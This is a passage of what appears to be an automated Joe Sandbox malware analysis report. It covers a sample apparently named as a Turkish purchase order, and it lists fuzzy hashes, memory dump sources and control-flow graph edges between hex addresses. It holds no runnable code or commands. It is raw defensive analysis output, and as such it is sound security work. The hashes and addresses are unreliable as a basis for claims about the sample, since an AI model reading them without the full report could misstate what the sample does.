                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq$(bq$Hbq
                                                                        • API String ID: 0-2835675688
                                                                        • Opcode ID: 203745e1868b585389defcb284e6e5622396269e3463ba1b9bdf1669f1b6ed05
                                                                        • Instruction ID: 0680b8aee1909757992735946604b4ae7924c8cdb8dfb822724d40d779d6ddf4
                                                                        • Opcode Fuzzy Hash: 203745e1868b585389defcb284e6e5622396269e3463ba1b9bdf1669f1b6ed05
                                                                        • Instruction Fuzzy Hash: 6281D132B002099FCB15EF68D48496EBBB2FFC5300F1585A9E406AB365DB34ED45CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648735395.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_59b0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q
                                                                        • API String ID: 0-2697143702
                                                                        • Opcode ID: 0a12ec4d342f1fa62cdfadef2c420d73a71ec1c9c2b30968d68690469cf6b525
                                                                        • Instruction ID: 83d706a2dcaa17f4948792237605d46eb98e04c6bbe27645293574c0c020be5e
                                                                        • Opcode Fuzzy Hash: 0a12ec4d342f1fa62cdfadef2c420d73a71ec1c9c2b30968d68690469cf6b525
                                                                        • Instruction Fuzzy Hash: 5E420935E04209CFEB14DFA4D699AFEBBB6FB48300F108459D512AB394DB74A982CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2224 5ad3a19-5ad3a54 2226 5ad3a5d-5ad3a70 call 5ad36a8 2224->2226 2227 5ad3a56 2224->2227 2230 5ad3bb4-5ad3bbb 2226->2230 2231 5ad3a76-5ad3a89 2226->2231 2227->2226 2232 5ad3e55-5ad3e5c 2230->2232 2233 5ad3bc1-5ad3bd6 2230->2233 2241 5ad3a8b-5ad3a92 2231->2241 2242 5ad3a97-5ad3ab1 2231->2242 2234 5ad3e5e-5ad3e67 2232->2234 2235 5ad3ecb-5ad3ed2 2232->2235 2243 5ad3bd8-5ad3bda 2233->2243 2244 5ad3bf6-5ad3bfc 2233->2244 2234->2235 2240 5ad3e69-5ad3e7c 2234->2240 2238 5ad3f6e-5ad3f75 2235->2238 2239 5ad3ed8-5ad3ee1 2235->2239 2246 5ad3f77-5ad3f88 2238->2246 2247 5ad3f91-5ad3f97 2238->2247 2239->2238 2245 5ad3ee7-5ad3efa 2239->2245 2240->2235 2261 5ad3e7e-5ad3ec3 call 5ad0b20 2240->2261 2248 5ad3bad 2241->2248 2256 5ad3ab8-5ad3ac5 2242->2256 2257 5ad3ab3-5ad3ab6 2242->2257 2243->2244 2250 5ad3bdc-5ad3bf3 2243->2250 2251 5ad3cc4-5ad3cc8 2244->2251 2252 5ad3c02-5ad3c04 2244->2252 2268 5ad3f0d-5ad3f11 2245->2268 2269 5ad3efc-5ad3f0b 2245->2269 2246->2247 2270 5ad3f8a 2246->2270 2254 5ad3fa9-5ad3fb2 2247->2254 2255 5ad3f99-5ad3f9f 2247->2255 2248->2230 2250->2244 2251->2232 2264 5ad3cce-5ad3cd0 2251->2264 2252->2251 2260 5ad3c0a-5ad3c24 2252->2260 2262 5ad3fb5-5ad402a 2255->2262 2263 5ad3fa1-5ad3fa7 2255->2263 2266 5ad3ac7-5ad3adb 2256->2266 2257->2266 2378 5ad3c26 call 5ad41e8 2260->2378 2379 5ad3c26 call 5ad41d8 2260->2379 2261->2235 2301 5ad3ec5-5ad3ec8 2261->2301 2342 5ad402c-5ad4036 2262->2342 2343 5ad4038 2262->2343 2263->2254 2263->2262 2264->2232 2265 5ad3cd6-5ad3cdf 2264->2265 2271 5ad3e32-5ad3e38 2265->2271 2266->2248 2297 5ad3ae1-5ad3b35 2266->2297 2273 5ad3f31-5ad3f33 2268->2273 2274 5ad3f13-5ad3f15 2268->2274 2269->2268 2270->2247 2278 5ad3e4b 2271->2278 2279 5ad3e3a-5ad3e49 2271->2279 2273->2238 2283 5ad3f35-5ad3f3b 2273->2283 2274->2273 2282 5ad3f17-5ad3f2e 2274->2282 2286 5ad3e4d-5ad3e4f 2278->2286 2279->2286 2282->2273 2283->2238 2284 5ad3f3d-5ad3f6b 2283->2284 2284->2238 2286->2232 2289 5ad3ce4-5ad3cf2 call 5ad22f0 2286->2289 2287 5ad3c2c-5ad3c8b call 5ad0b20 * 4 2331 5ad3c8d-5ad3c9f call 5ad0b20 2287->2331 2332 5ad3ca2-5ad3cc1 call 5ad0b20 2287->2332 2306 5ad3d0a-5ad3d24 2289->2306 2307 5ad3cf4-5ad3cfa 2289->2307 2337 5ad3b37-5ad3b39 2297->2337 2338 5ad3b43-5ad3b47 2297->2338 2301->2235 2306->2271 2316 5ad3d2a-5ad3d2e 2306->2316 2310 5ad3cfc 2307->2310 2311 5ad3cfe-5ad3d00 2307->2311 2310->2306 2311->2306 2317 5ad3d4f 2316->2317 2318 5ad3d30-5ad3d39 2316->2318 2324 5ad3d52-5ad3d6c 2317->2324 2322 5ad3d3b-5ad3d3e 2318->2322 2323 5ad3d40-5ad3d43 2318->2323 2326 5ad3d4d 2322->2326 2323->2326 2324->2271 2345 5ad3d72-5ad3df3 call 5ad0b20 * 4 2324->2345 2326->2324 2331->2332 2332->2251 2337->2338 2338->2248 2344 5ad3b49-5ad3b61 2338->2344 2346 5ad403d-5ad403f 2342->2346 2343->2346 2344->2248 2352 5ad3b63-5ad3b6f 2344->2352 2372 5ad3e0a-5ad3e30 call 5ad0b20 2345->2372 2373 5ad3df5-5ad3e07 call 5ad0b20 2345->2373 2347 5ad4046-5ad404b 2346->2347 2348 5ad4041-5ad4044 2346->2348 2349 5ad4051-5ad407e 2347->2349 2348->2349 2354 5ad3b7e-5ad3b84 2352->2354 2355 5ad3b71-5ad3b74 2352->2355 2358 5ad3b8c-5ad3b95 2354->2358 2359 5ad3b86-5ad3b89 2354->2359 2355->2354 2361 5ad3ba4-5ad3baa 2358->2361 2362 5ad3b97-5ad3b9a 2358->2362 2359->2358 2361->2248 2362->2361 2372->2232 2372->2271 2373->2372 2378->2287 2379->2287
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q
                                                                        • API String ID: 0-355816377
                                                                        • Opcode ID: c45d8e9ea2c26675fda58c9e97b24f5a2424435bf073e15f850aa434a1f060db
                                                                        • Instruction ID: 9012b14d1e813580aa98c9f411d5a5458ebac75b06f4c653122a02506d3bd176
                                                                        • Opcode Fuzzy Hash: c45d8e9ea2c26675fda58c9e97b24f5a2424435bf073e15f850aa434a1f060db
                                                                        • Instruction Fuzzy Hash: 65127B31B002199FCF15EFA4C955EBDBBF2BF48700F144816E852AB295DB34AD46CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2380 5ad6b78-5ad6b8a 2381 5ad6b8c-5ad6bad 2380->2381 2382 5ad6bb4-5ad6bb8 2380->2382 2381->2382 2383 5ad6bba-5ad6bbc 2382->2383 2384 5ad6bc4-5ad6bd3 2382->2384 2383->2384 2386 5ad6bdf-5ad6c0b 2384->2386 2387 5ad6bd5 2384->2387 2390 5ad6e38-5ad6e7f 2386->2390 2391 5ad6c11-5ad6c17 2386->2391 2387->2386 2425 5ad6e95-5ad6ea1 2390->2425 2426 5ad6e81 2390->2426 2392 5ad6c1d-5ad6c23 2391->2392 2393 5ad6ce9-5ad6ced 2391->2393 2392->2390 2396 5ad6c29-5ad6c36 2392->2396 2397 5ad6cef-5ad6cf8 2393->2397 2398 5ad6d10-5ad6d19 2393->2398 2399 5ad6c3c-5ad6c45 2396->2399 2400 5ad6cc8-5ad6cd1 2396->2400 2397->2390 2401 5ad6cfe-5ad6d0e 2397->2401 2402 5ad6d3e-5ad6d41 2398->2402 2403 5ad6d1b-5ad6d3b 2398->2403 2399->2390 2406 5ad6c4b-5ad6c63 2399->2406 2400->2390 2407 5ad6cd7-5ad6ce3 2400->2407 2405 5ad6d44-5ad6d4a 2401->2405 2402->2405 2403->2402 2405->2390 2409 5ad6d50-5ad6d63 2405->2409 2410 5ad6c6f-5ad6c81 2406->2410 2411 5ad6c65 2406->2411 2407->2392 2407->2393 2409->2390 2413 5ad6d69-5ad6d79 2409->2413 2410->2400 2419 5ad6c83-5ad6c89 2410->2419 2411->2410 2413->2390 2415 5ad6d7f-5ad6d8c 2413->2415 2415->2390 2418 5ad6d92-5ad6da7 2415->2418 2418->2390 2427 5ad6dad-5ad6dd0 2418->2427 2420 5ad6c8b 2419->2420 2421 5ad6c95-5ad6c9b 2419->2421 2420->2421 2421->2390 2422 5ad6ca1-5ad6cc5 2421->2422 2430 5ad6ead-5ad6ec9 2425->2430 2431 5ad6ea3 2425->2431 2429 5ad6e84-5ad6e86 2426->2429 2427->2390 2436 5ad6dd2-5ad6ddd 2427->2436 2432 5ad6e88-5ad6e93 2429->2432 2433 5ad6eca-5ad6ef7 call 5ad22f0 2429->2433 2431->2430 2432->2425 2432->2429 2445 5ad6f0f-5ad6f11 2433->2445 2446 5ad6ef9-5ad6eff 2433->2446 2437 5ad6ddf-5ad6de9 2436->2437 2438 5ad6e2e-5ad6e35 2436->2438 2437->2438 2444 5ad6deb-5ad6e01 2437->2444 2453 5ad6e0d-5ad6e26 2444->2453 2454 5ad6e03 2444->2454 2467 5ad6f13 call 5ad8131 2445->2467 2468 5ad6f13 call 5ad6f81 2445->2468 2469 5ad6f13 call 5ad6f90 2445->2469 2447 5ad6f01 2446->2447 2448 5ad6f03-5ad6f05 2446->2448 2447->2445 2448->2445 2449 5ad6f19-5ad6f1d 2451 5ad6f1f-5ad6f36 2449->2451 2452 5ad6f68-5ad6f78 2449->2452 2451->2452 2460 5ad6f38-5ad6f42 2451->2460 2453->2438 2454->2453 2462 5ad6f55-5ad6f65 2460->2462 2463 5ad6f44-5ad6f53 2460->2463 2463->2462 2467->2449 2468->2449 2469->2449
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq$d
                                                                        • API String ID: 0-3334038649
                                                                        • Opcode ID: b5b1c47a2cc573bdde03c8bb6460b206777c4766832f32a1199543f81839f663
                                                                        • Instruction ID: e047f3ba517560aae9ab351d1083a85f2349226fab00ccb2f27c657ff7c904e2
                                                                        • Opcode Fuzzy Hash: b5b1c47a2cc573bdde03c8bb6460b206777c4766832f32a1199543f81839f663
                                                                        • Instruction Fuzzy Hash: ACD16C356006068FCB14DF69C484D6AFBF2FF88311B558959E46A9B365DB30FC46CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2470 59b18c0-59b18e5 2471 59b18ec-59b1910 2470->2471 2472 59b18e7 2470->2472 2473 59b1912-59b191b 2471->2473 2474 59b1931 2471->2474 2472->2471 2475 59b191d-59b1920 2473->2475 2476 59b1922-59b1925 2473->2476 2477 59b1934-59b1938 2474->2477 2478 59b192f 2475->2478 2476->2478 2479 59b1c91-59b1ca8 2477->2479 2478->2477 2481 59b1cae-59b1cb2 2479->2481 2482 59b193d-59b1941 2479->2482 2485 59b1cdb-59b1cdf 2481->2485 2486 59b1cb4-59b1cd8 2481->2486 2483 59b1943-59b19a0 2482->2483 2484 59b1946-59b194a 2482->2484 2495 59b19a2-59b1a13 2483->2495 2496 59b19a5-59b19a9 2483->2496 2490 59b194c-59b1970 2484->2490 2491 59b1973-59b1997 2484->2491 2487 59b1ce1-59b1cea 2485->2487 2488 59b1d00 2485->2488 2486->2485 2493 59b1cec-59b1cef 2487->2493 2494 59b1cf1-59b1cf4 2487->2494 2492 59b1d03-59b1d09 2488->2492 2490->2491 2491->2479 2499 59b1cfe 2493->2499 2494->2499 2504 59b1a18-59b1a1c 2495->2504 2505 59b1a15-59b1a72 2495->2505 2501 59b19ab-59b19cf 2496->2501 2502 59b19d2-59b19e3 2496->2502 2499->2492 2501->2502 2585 59b19e6 call 5b72470 2502->2585 2586 59b19e6 call 5b724b8 2502->2586 2587 59b19e6 call 5b724a8 2502->2587 2510 59b1a1e-59b1a42 2504->2510 2511 59b1a45-59b1a69 2504->2511 2515 59b1a77-59b1a7b 2505->2515 2516 59b1a74-59b1ad0 2505->2516 2510->2511 2511->2479 2520 59b1a7d-59b1aa1 2515->2520 2521 59b1aa4-59b1ac7 2515->2521 2527 59b1ad2-59b1b34 2516->2527 2528 59b1ad5-59b1ad9 2516->2528 2517 59b19ec-59b19f9 2525 59b19fb-59b1a01 2517->2525 2526 59b1a09-59b1a0a 2517->2526 2520->2521 2521->2479 2525->2526 2526->2479 2537 59b1b39-59b1b3d 2527->2537 2538 59b1b36-59b1b98 2527->2538 2532 59b1adb-59b1aff 2528->2532 2533 59b1b02-59b1b1a 2528->2533 2532->2533 2547 59b1b2a-59b1b2b 2533->2547 2548 59b1b1c-59b1b22 2533->2548 2543 59b1b3f-59b1b63 2537->2543 2544 59b1b66-59b1b7e 2537->2544 2549 59b1b9a-59b1bfc 2538->2549 2550 59b1b9d-59b1ba1 2538->2550 2543->2544 2558 59b1b8e-59b1b8f 2544->2558 2559 59b1b80-59b1b86 2544->2559 2547->2479 2548->2547 2560 59b1bfe-59b1c5d 2549->2560 2561 59b1c01-59b1c05 2549->2561 2553 59b1bca-59b1be2 2550->2553 2554 59b1ba3-59b1bc7 2550->2554 2569 59b1bf2-59b1bf3 2553->2569 2570 59b1be4-59b1bea 2553->2570 2554->2553 2558->2479 2559->2558 2571 59b1c5f-59b1c83 2560->2571 2572 59b1c86-59b1c89 2560->2572 2564 59b1c2e-59b1c46 2561->2564 2565 59b1c07-59b1c2b 2561->2565 2577 59b1c48-59b1c4e 2564->2577 2578 59b1c56-59b1c57 2564->2578 2565->2564 2569->2479 2570->2569 2571->2572 2572->2479 2577->2578 2578->2479 2585->2517 2586->2517 2587->2517
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648735395.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_59b0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q
                                                                        • API String ID: 0-2697143702
                                                                        • Opcode ID: fd8a94424711e1418d0fb7d87eba0cb3dc62009bc1db678a7504eeabd05fd7e9
                                                                        • Instruction ID: 78b983d98450cddb68816414a63f20e58339336fed503e63492761c47a269c2b
                                                                        • Opcode Fuzzy Hash: fd8a94424711e1418d0fb7d87eba0cb3dc62009bc1db678a7504eeabd05fd7e9
                                                                        • Instruction Fuzzy Hash: B2E1F735E14218DFEB18DFA4E5A9AECBBB6FF89311F208429E416A7350CB756845CF10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2588 59b24a8-59b24cd 2589 59b24cf 2588->2589 2590 59b24d4-59b24f6 2588->2590 2589->2590 2591 59b24f8-59b2501 2590->2591 2592 59b2517 2590->2592 2593 59b2508-59b250b 2591->2593 2594 59b2503-59b2506 2591->2594 2595 59b251a-59b251e 2592->2595 2596 59b2515 2593->2596 2594->2596 2597 59b27d4-59b27eb 2595->2597 2596->2595 2599 59b2523-59b2527 2597->2599 2600 59b27f1-59b27f5 2597->2600 2601 59b2529-59b25c6 2599->2601 2602 59b252f-59b2533 2599->2602 2603 59b281e-59b2822 2600->2603 2604 59b27f7-59b2804 2600->2604 2611 59b25c8-59b2665 2601->2611 2612 59b25ce-59b25d2 2601->2612 2608 59b255c-59b2581 2602->2608 2609 59b2535-59b2559 2602->2609 2605 59b2843 2603->2605 2606 59b2824-59b282d 2603->2606 2622 59b280d-59b281b 2604->2622 2615 59b2846-59b284c 2605->2615 2613 59b282f-59b2832 2606->2613 2614 59b2834-59b2837 2606->2614 2635 59b2583-59b258c 2608->2635 2636 59b25a2 2608->2636 2609->2608 2623 59b266d-59b2671 2611->2623 2624 59b2667-59b2704 2611->2624 2617 59b25fb-59b2620 2612->2617 2618 59b25d4-59b25f8 2612->2618 2620 59b2841 2613->2620 2614->2620 2648 59b2622-59b262b 2617->2648 2649 59b2641 2617->2649 2618->2617 2620->2615 2622->2603 2629 59b269a-59b26bf 2623->2629 2630 59b2673-59b2697 2623->2630 2633 59b270c-59b2710 2624->2633 2634 59b2706-59b27a0 2624->2634 2667 59b26c1-59b26ca 2629->2667 2668 59b26e0 2629->2668 2630->2629 2641 59b2739-59b275e 2633->2641 2642 59b2712-59b2736 2633->2642 2651 59b27c9-59b27cc 2634->2651 2652 59b27a2-59b27c6 2634->2652 2645 59b258e-59b2591 2635->2645 2646 59b2593-59b2596 2635->2646 2647 59b25a5-59b25ac 2636->2647 2678 59b277f 2641->2678 2679 59b2760-59b2769 2641->2679 2642->2641 2650 59b25a0 2645->2650 2646->2650 2653 59b25ae-59b25b4 2647->2653 2654 59b25bc-59b25bd 2647->2654 2659 59b262d-59b2630 2648->2659 2660 59b2632-59b2635 2648->2660 2661 59b2644-59b264b 2649->2661 2650->2647 2651->2597 2652->2651 2653->2654 2654->2597 2664 59b263f 2659->2664 2660->2664 2665 59b265b-59b265c 2661->2665 2666 59b264d-59b2653 2661->2666 2664->2661 2665->2597 2666->2665 2671 59b26cc-59b26cf 2667->2671 2672 59b26d1-59b26d4 2667->2672 2673 59b26e3-59b26ea 2668->2673 2680 59b26de 2671->2680 2672->2680 2675 59b26fa-59b26fb 2673->2675 2676 59b26ec-59b26f2 2673->2676 2675->2597 2676->2675 2683 59b2782-59b2789 2678->2683 2681 59b276b-59b276e 2679->2681 2682 59b2770-59b2773 2679->2682 2680->2673 2686 59b277d 2681->2686 2682->2686 2687 59b278b-59b2791 2683->2687 2688 59b2799-59b279a 2683->2688 2686->2683 2687->2688 2688->2597
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648735395.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_59b0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q
                                                                        • API String ID: 0-2697143702
                                                                        • Opcode ID: b1af94383f583c24ea3f488e6fb723aa500da144c535ba380b80006018020ecf
                                                                        • Instruction ID: 7d40e7ed63cd1cc2fa342d237c977de0a535e0516976fe524fcf3086c4a1fbc7
                                                                        • Opcode Fuzzy Hash: b1af94383f583c24ea3f488e6fb723aa500da144c535ba380b80006018020ecf
                                                                        • Instruction Fuzzy Hash: 19C10578E04209CFEF18DFA4C5996EDBBB6FF48301F10842AD4126B290DBB46982CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2689 59b1598-59b15bd 2691 59b15bf 2689->2691 2692 59b15c4-59b15e1 2689->2692 2691->2692 2693 59b15e3-59b15ec 2692->2693 2694 59b1602 2692->2694 2696 59b15ee-59b15f1 2693->2696 2697 59b15f3-59b15f6 2693->2697 2695 59b1605-59b1609 2694->2695 2698 59b1824-59b183b 2695->2698 2699 59b1600 2696->2699 2697->2699 2701 59b160e-59b1612 2698->2701 2702 59b1841-59b1845 2698->2702 2699->2695 2703 59b161a-59b161e 2701->2703 2704 59b1614-59b16b2 2701->2704 2705 59b186f-59b1873 2702->2705 2706 59b1847-59b186c 2702->2706 2710 59b1648-59b166d 2703->2710 2711 59b1620-59b1639 2703->2711 2715 59b16ba-59b16be 2704->2715 2716 59b16b4-59b1752 2704->2716 2707 59b1875-59b187e 2705->2707 2708 59b1894 2705->2708 2706->2705 2712 59b1880-59b1883 2707->2712 2713 59b1885-59b1888 2707->2713 2714 59b1897-59b189d 2708->2714 2736 59b166f-59b1678 2710->2736 2737 59b168e 2710->2737 2746 59b1642-59b1645 2711->2746 2721 59b1892 2712->2721 2713->2721 2718 59b16e8-59b170d 2715->2718 2719 59b16c0-59b16e5 2715->2719 2725 59b175a-59b175e 2716->2725 2726 59b1754-59b17ef 2716->2726 2751 59b170f-59b1718 2718->2751 2752 59b172e 2718->2752 2719->2718 2721->2714 2730 59b1788-59b17ad 2725->2730 2731 59b1760-59b1785 2725->2731 2734 59b1819-59b181c 2726->2734 2735 59b17f1-59b1816 2726->2735 2762 59b17af-59b17b8 2730->2762 2763 59b17ce 2730->2763 2731->2730 2734->2698 2735->2734 2741 59b167a-59b167d 2736->2741 2742 59b167f-59b1682 2736->2742 2743 59b1691-59b1698 2737->2743 2748 59b168c 2741->2748 2742->2748 2749 59b169a-59b16a0 2743->2749 2750 59b16a8-59b16a9 2743->2750 2746->2710 2748->2743 2749->2750 2750->2698 2757 59b171a-59b171d 2751->2757 2758 59b171f-59b1722 2751->2758 2753 59b1731-59b1738 2752->2753 2759 59b173a-59b1740 2753->2759 2760 59b1748-59b1749 2753->2760 2764 59b172c 2757->2764 2758->2764 2759->2760 2760->2698 2765 59b17ba-59b17bd 2762->2765 2766 59b17bf-59b17c2 2762->2766 2767 59b17d1-59b17d8 2763->2767 2764->2753 2770 59b17cc 2765->2770 2766->2770 2771 59b17da-59b17e0 2767->2771 2772 59b17e8-59b17e9 2767->2772 2770->2767 2771->2772 2772->2698
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648735395.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_59b0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q
                                                                        • API String ID: 0-2697143702
                                                                        • Opcode ID: 1e9e8371e264d7f940941c3a75fb34276246049f33ad73db4bc73a5ce13cdfc8
                                                                        • Instruction ID: dd7d0a405c08aae12ffe37418ed62b459683604c3e61a7547d515846d8bec6e9
                                                                        • Opcode Fuzzy Hash: 1e9e8371e264d7f940941c3a75fb34276246049f33ad73db4bc73a5ce13cdfc8
                                                                        • Instruction Fuzzy Hash: 24A10875E04209CFEB18DFA4D59A6EDBBB6FF89301F148429E41267390CB74A946CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2773 5ad2fe8-5ad2ffa 2774 5ad30ee-5ad3113 2773->2774 2775 5ad3000-5ad3002 2773->2775 2777 5ad311a-5ad313e 2774->2777 2776 5ad3008-5ad3014 2775->2776 2775->2777 2781 5ad3028-5ad3038 2776->2781 2782 5ad3016-5ad3022 2776->2782 2789 5ad3145-5ad3169 2777->2789 2781->2789 2790 5ad303e-5ad304c 2781->2790 2782->2781 2782->2789 2793 5ad3170-5ad31f5 call 5ad0448 2789->2793 2790->2793 2794 5ad3052-5ad3057 2790->2794 2818 5ad31fa-5ad3208 call 5ad22f0 2793->2818 2827 5ad3059 call 5ad2fe8 2794->2827 2828 5ad3059 call 5ad2fd8 2794->2828 2829 5ad3059 call 5ad31e8 2794->2829 2830 5ad3059 call 5ad31d8 2794->2830 2797 5ad305f-5ad30a8 2811 5ad30cb-5ad30eb call 5ad10f0 2797->2811 2812 5ad30aa-5ad30c3 2797->2812 2812->2811 2823 5ad320a-5ad3210 2818->2823 2824 5ad3220-5ad3222 2818->2824 2825 5ad3214-5ad3216 2823->2825 2826 5ad3212 2823->2826 2825->2824 2826->2824 2827->2797 2828->2797 2829->2797 2830->2797
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq$Hbq
                                                                        • API String ID: 0-4081012451
                                                                        • Opcode ID: dbb334222a58e3170d27c02b9f076cd39a997664fb2b7f24897542c8246e3b25
                                                                        • Instruction ID: cd8873228a984f95b3406f1c1b25f3d5a94e9d7372c66f06f31d8c29a3194df8
                                                                        • Opcode Fuzzy Hash: dbb334222a58e3170d27c02b9f076cd39a997664fb2b7f24897542c8246e3b25
                                                                        • Instruction Fuzzy Hash: 8B515D367002158FCB65AF39C454A2EBBB6FFC9301B10886DE5069B3A1DE35ED06CB65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2831 5ad55a9-5ad55e0 2833 5ad56cc-5ad56f1 2831->2833 2834 5ad55e6-5ad55ea 2831->2834 2841 5ad56f8-5ad571c 2833->2841 2835 5ad55ec-5ad55f8 2834->2835 2836 5ad55fe-5ad5602 2834->2836 2835->2836 2835->2841 2837 5ad5608-5ad561f 2836->2837 2838 5ad5723-5ad5748 2836->2838 2849 5ad5621-5ad562d 2837->2849 2850 5ad5633-5ad5637 2837->2850 2858 5ad574f-5ad57a2 2838->2858 2841->2838 2849->2850 2849->2858 2852 5ad5639-5ad5652 2850->2852 2853 5ad5663-5ad567c call 5ad2228 2850->2853 2852->2853 2864 5ad5654-5ad5657 2852->2864 2865 5ad567e-5ad56a2 2853->2865 2866 5ad56a5-5ad56c9 2853->2866 2874 5ad57da-5ad57ff 2858->2874 2875 5ad57a4-5ad57c4 2858->2875 2868 5ad5660 2864->2868 2868->2853 2882 5ad5806-5ad585a 2874->2882 2875->2882 2883 5ad57c6-5ad57d7 2875->2883 2889 5ad5901-5ad593d 2882->2889 2890 5ad5860-5ad586c 2882->2890 2893 5ad586e-5ad5875 2890->2893 2894 5ad5876-5ad588a call 5ad0a30 2890->2894 2898 5ad588c-5ad58b1 2894->2898 2899 5ad58f9-5ad5900 2894->2899 2905 5ad58f4-5ad58f7 2898->2905 2906 5ad58b3-5ad58cd 2898->2906 2905->2898 2905->2899 2906->2905 2908 5ad58cf-5ad58d8 2906->2908 2909 5ad58da-5ad58dd 2908->2909 2910 5ad58e7-5ad58f3 2908->2910 2909->2910
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq$(bq
                                                                        • API String ID: 0-4224401849
                                                                        • Opcode ID: b5961907be88ec99d045b8b71555d7bbde941415d340ed11c58e05b56f9aa3e5
                                                                        • Instruction ID: 3e3da44e2ccdafbd7020d40a7443034e3eb9125e7b399634c57cc9a0e1dd4058
                                                                        • Opcode Fuzzy Hash: b5961907be88ec99d045b8b71555d7bbde941415d340ed11c58e05b56f9aa3e5
                                                                        • Instruction Fuzzy Hash: 1B5190327002158FCB15DF28D454AAE7BA2FF88741F244169E816CB3A5CF35DD468BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2911 5e7f620-5e7f62f 2912 5e7f635-5e7f641 2911->2912 2913 5e7f748-5e7f76d 2911->2913 2916 5e7f647-5e7f64f 2912->2916 2917 5e7f774-5e7f7e6 2912->2917 2913->2917 2923 5e7f65a-5e7f65e 2916->2923 2924 5e7f671-5e7f688 2923->2924 2925 5e7f660-5e7f66f 2923->2925 2931 5e7f692-5e7f694 2924->2931 2932 5e7f68a 2924->2932 2925->2924 2936 5e7f69b-5e7f6a8 2931->2936 2934 5e7f696 2932->2934 2935 5e7f68c-5e7f690 2932->2935 2934->2936 2935->2931 2935->2934 2937 5e7f6b0-5e7f6b3 2936->2937 2938 5e7f6aa-5e7f6ae 2936->2938 2940 5e7f6b6-5e7f6be 2937->2940 2938->2940 2941 5e7f6c0-5e7f6c8 2940->2941 2942 5e7f6ca 2940->2942 2944 5e7f6ce-5e7f72d 2941->2944 2942->2944 2947 5e7f741-5e7f745 2944->2947 2948 5e7f72f-5e7f739 2944->2948 2948->2947
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650702212.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
